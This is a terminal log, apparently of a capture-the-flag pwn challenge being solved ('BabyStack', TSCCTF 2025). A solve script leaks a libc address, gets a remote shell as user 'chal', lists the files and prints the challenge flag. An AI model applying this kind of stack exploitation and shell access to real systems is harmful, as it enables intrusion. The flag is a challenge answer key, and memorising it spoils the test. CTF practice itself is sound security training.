mito@mito-virtual-machine:~/CTF/TSCCTF_2025/Pwn_BabyStack/BabyStack/share$ python3 solve.py r
[+] Opening connection to 172.31.2.2 on port 36902: Done
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
puts_addr = 0x7fadf666fe50
libc_base = 0x7fadf65ef000
[*] Paused (press any to continue)
[*] Switching to interactive mode
$ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
$ ls -l
total 64
lrwxrwxrwx   1 root root    7 Sep 11 14:04 bin -> usr/bin
drwxr-xr-x   2 root root 4096 Apr 18  2022 boot
drwxr-xr-x   5 root root  340 Jan 13 05:46 dev
drwxr-xr-x   1 root root 4096 Jan 13 05:46 etc
drwxr-xr-x   1 root root 4096 Jan  5 14:25 home
lrwxrwxrwx   1 root root    7 Sep 11 14:04 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Sep 11 14:04 lib32 -> usr/lib32
lrwxrwxrwx   1 root root    9 Sep 11 14:04 lib64 -> usr/lib64
lrwxrwxrwx   1 root root   10 Sep 11 14:04 libx32 -> usr/libx32
drwxr-xr-x   2 root root 4096 Sep 11 14:04 media
drwxr-xr-x   2 root root 4096 Sep 11 14:04 mnt
drwxr-xr-x   2 root root 4096 Sep 11 14:04 opt
dr-xr-xr-x 461 root root    0 Jan 13 05:46 proc
drwx------   2 root root 4096 Sep 11 14:07 root
drwxr-xr-x   5 root root 4096 Sep 11 14:08 run
lrwxrwxrwx   1 root root    8 Sep 11 14:04 sbin -> usr/sbin
drwxr-xr-x   2 root root 4096 Sep 11 14:04 srv
dr-xr-xr-x  13 root root    0 Jan 13 05:46 sys
drwxrwxrwt   1 root root 4096 Jan  5 14:25 tmp
drwxr-xr-x   1 root root 4096 Sep 11 14:04 usr
drwxr-xr-x   1 root root 4096 Sep 11 14:07 var
$ cd /home
$ ls
chal
$ cd chal
$ ls -l
total 32
-rw-r--r-- 1 root root    40 Jan  5 14:24 Makefile
-rwxr-xr-x 1 root root 16272 Jan  5 14:24 chal
-rw-r--r-- 1 root root   774 Jan  5 14:24 chal.c
-rw-r--r-- 1 root root    43 Jan  5 14:24 flag.txt
-rwxr-xr-x 1 root root    55 Jan  5 14:24 run.sh
$ cat flag.txt
TSC{YoU_KnOw_h0w_7h3_b4bY_st@(k_w0rk$_!!!}
[*] Got EOF while reading in interactive
